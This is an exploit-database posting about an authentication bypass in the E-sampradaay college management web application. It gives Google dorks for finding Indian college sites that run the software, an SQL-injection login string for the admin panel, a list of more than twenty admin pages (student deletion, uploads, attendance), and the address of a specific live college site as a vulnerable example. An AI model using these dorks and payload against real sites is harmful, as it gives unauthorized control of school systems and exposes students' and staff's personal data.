Vibrant Hardware and Software Solutions E-sampradaay India Improper Authorization Vulnerability

2018.11.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : Vibrant Hardware and Software Solutions E-sampradaay Improper Authorization Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 09/11/2018 # Vendor Homepage : vibrantitsolutions.com # Tested On : Windows and Linux # Category : WebApps # Google Dork : intext:''Designed by Vibrant Hardware and Software Solutions'' site:edu.in intext:''Designed : College ICT Laboratory'' site:edu.in intext:''COPYRIGHT © 2016 VPCCECM & DEVELOPED BY VPC ICT LAB'' site:edu.in intext:''© Copyright 2010 Vibrant IT Solutions Pvt. Ltd. All rights reserved.'' # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] CWE-284 [ Improper Access Control ] CWE-285 [ Improper Authorization ] ################################################################################################# # Admin Panel Login Path : /esampradaay/admin_login.php Admin Username : anything' OR 'x'='x Admin Password : anything' OR 'x'='x /esampradaay/admin_dashboard.php /esampradaay/vidya_teaching_staff.php /esampradaay/vidya_staff_register.php /esampradaay/student_registration.php /esampradaay/Parent_registration.php /esampradaay/Management_register.php /esampradaay/Alumini_Register.php /esampradaay/student_attendance_menu.php /esampradaay/student_attendance_upload.php /esampradaay/dailycwreportAdmin.php /esampradaay/staff_attendance_menu.php /esampradaay/class.php /esampradaay/eventmenu.php /esampradaay/admin_menu.php /esampradaay/addRollNum.php /esampradaay/delete_student.php /esampradaay/circular_upload.php /esampradaay/certificate_upload.php /esampradaay/cirview.php /esampradaay/update_student.php /esampradaay/staff_login.php /esampradaay/update_nonteaching.php ################################################################################################# # Example Vulnerable Site => [+] vidyaprabodhinicollege.edu.in/esampradaay/admin_login.php ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top